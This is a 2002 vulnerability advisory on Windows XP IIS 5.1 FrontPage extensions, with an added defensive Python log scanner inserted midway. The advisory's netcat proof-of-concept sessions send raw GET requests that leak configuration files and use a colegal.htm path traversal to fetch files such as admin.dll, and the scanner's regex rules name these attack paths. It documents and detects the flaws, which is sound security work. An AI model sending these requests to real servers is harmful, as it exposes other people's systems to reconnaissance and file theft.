Hack Server IIS 5.1


Affected : Windows XP with IIS 5.1 :
Type : MULTIPLE Remote Issues :
Type : Remote/ Local Security Issues :
Date : 10-02-2002 :
Author : NtWaK0 @ www.SafeHack.com :
Credit : NtWaK0 @ www.SafeHack.com :
+---------------------------------------------------------------------------.

+--------------------.
Remote/Local Exploit \
+----------------------`----------------------------------------------------.
:
+-----------. * * * www.SafeHack.com * * * :
Disclaimer \ :
+-------------`-------------------------------------------------------------.
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. So, don't shoot the messenger. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------. :
T.O.C. \ :
+---------`-----------------------------------------------------------------.
:
:
[ Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ] :
:
[ The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ] :
:
[ The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ] :
:
+-------------. :
Brief History \ :
+---------------`-----------------------------------------------------------.
I had the chance to play for a couple of hours with IIS 5.1 on a friend's box, :
thanks to Recon. While I was trying some stuff on IIS 5.1 I found MANY problems :
with the default IIS 5.1 installation and with files installed by default. :
:
This one is not the same as the one reported earlier. The one reported :
before had to deal with "GET /_vti_bin/shtml.dll". :
A copy of it can be found at : :
http://www.safehack.com/Advisory/shtmldump.txt :
:
+-------+ :
Test OS :
+-------+ :
Tested on Windows XP with IIS 5.1 :
:
:
Please continue to read for more details. :
:
+-----------. :
The Problem \ :
+-------------`-------------------------------------------------------------.
:
>>> 1- Issue <<< :
:
Identify the web directory installation. By sending "GET /_vti_pvt/access.cnf" :
you can identify the web installation path. As we all know this is a helpful :
piece of information if someone is going to attack your web site. :
:
>>> Proof-Of-Concept <<< :
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/access.cnf :
vti_encoding:SR|utf8-nl :
RealmName:LAMER :
InheritPermissions:false :
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt :
:
There is another security issue with this too: "InheritPermissions:false" :
tells you the security inheritance setting of that folder. :
:
>>> 2- Issue <<< :
>>> Proof-Of-Concept <<< :
:
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/botinfs.cnf :
:
vti_encoding:SR|utf8-nl :
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\ :
40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar :
:
>>> 3- Issue <<< :
:
>>> Proof-Of-Concept <<< :
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/bots.cnf :
vti_encoding:SR|utf8-nl :
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared :
\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf :
vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft :
\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar :
\\\\fp4Avnb.dll :
:
>>> 4- Issue <<< :
Using GET /iishelp/common/colegal.htm you can access other files under the :
web structure. I did not have a chance to test it on files above the :
web structure. Like I said, I do not run IIS 5.1, but a friend does. :
One of these days I am going to buy more memory for one of my old boxes and :
slap IIS 5.1 on it to be able to do better tests. :
:
>>> Proof-Of-Concept <<< :
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf :
vti_encoding:SR|utf8-nl :
RealmName:LAMER :
InheritPermissions:false :
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt :
:
writeto.cnf [Extracted From] :
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp :
:
Back links for files that can be written to by users of the web, such as :
Save Results Form handler result files. Files that can be written to by :
users of the web have a looser security setting than regular web content. :
:
:
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll :
MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in DOS mode. :
:
:
:
C:\Tool>nc -v -n xx.xx.xxx.xxx 81 :
(UNKNOWN) [xx.xx.xxx.xxx] 81 (?) open :
GET /_vti_pvt/linkinfo.cnf :
vti_encoding:SR|utf8-nl :
javascript\:loadhelpfront();:localstart.asp :
javascript\:activate(<%=iver%>);:localstart.asp :
http\://www.safehack.com:index.htm :
/iishelp/common/colegal.htm:localstart.asp :
:
:
:
NOTE: A Google search for "writeto.cnf" returned alarming results: :
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta= :
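As an added example (not part of the original advisory), a defender-side check over IIS W3C extended log lines for the requests shown above: reads of /_vti_pvt/*.cnf, the /iishelp/common/colegal.htm:../ traversal, and access to /_vti_bin/_vti_adm/. The log lines are constructed samples and the rule names are my own.

```python
"""Flag IIS log entries matching the FrontPage _vti_pvt disclosure and the
/iishelp/common/colegal.htm:../ traversal from the advisory above.
SAMPLE_LOG is a constructed W3C extended log, not output of any real server."""
import re
from urllib.parse import unquote

# Rules applied to the URL-decoded, lower-cased cs-uri-stem. Order matters only
# for the order in which rule names are reported; every matching rule is kept.
RULES = [
    ("colegal-traversal",   re.compile(r"/iishelp/common/colegal\.htm:(\.\./)+")),
    ("vti_pvt-config-read", re.compile(r"/_vti_pvt/[^/]*\.cnf$")),
    ("vti_adm-dll-access",  re.compile(r"/_vti_bin/_vti_adm/")),
]

def parse_w3c(text):
    """Yield one dict per data line; the #Fields directive names the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def scan(text):
    """Return a finding per suspicious line. 'served' is True when the server
    answered 200, i.e. the file was actually disclosed rather than just probed."""
    findings = []
    for rec in parse_w3c(text):
        stem = unquote(rec.get("cs-uri-stem", "")).lower()
        hits = [name for name, rx in RULES if rx.search(stem)]
        if hits:
            findings.append({"ip": rec["c-ip"], "uri": rec["cs-uri-stem"],
                             "rules": hits, "served": rec.get("sc-status") == "200"})
    return findings

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.1
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-02-10 10:01:02 192.0.2.10 GET /index.htm - 200
2002-02-10 10:01:05 192.0.2.10 GET /_vti_pvt/access.cnf - 200
2002-02-10 10:01:09 192.0.2.10 GET /_VTI_PVT/botinfs.cnf - 404
2002-02-10 10:01:12 192.0.2.10 GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf - 200
2002-02-10 10:01:15 192.0.2.10 GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll - 200
2002-02-10 10:01:20 192.0.2.10 GET /iishelp/common/colegal.htm - 200
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} served={f['served']} {','.join(f['rules'])} {f['uri']}")
```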
:
:
+------------. :
The Solution \ :
+--------------`------------------------------------------------------------.
No idea. Vendor was informed. :
If you are going to use the issues found here, credit must be given to the :
author. NtWaK0 @ www.safehack.com :
+---------------------------------------------------------------------------.
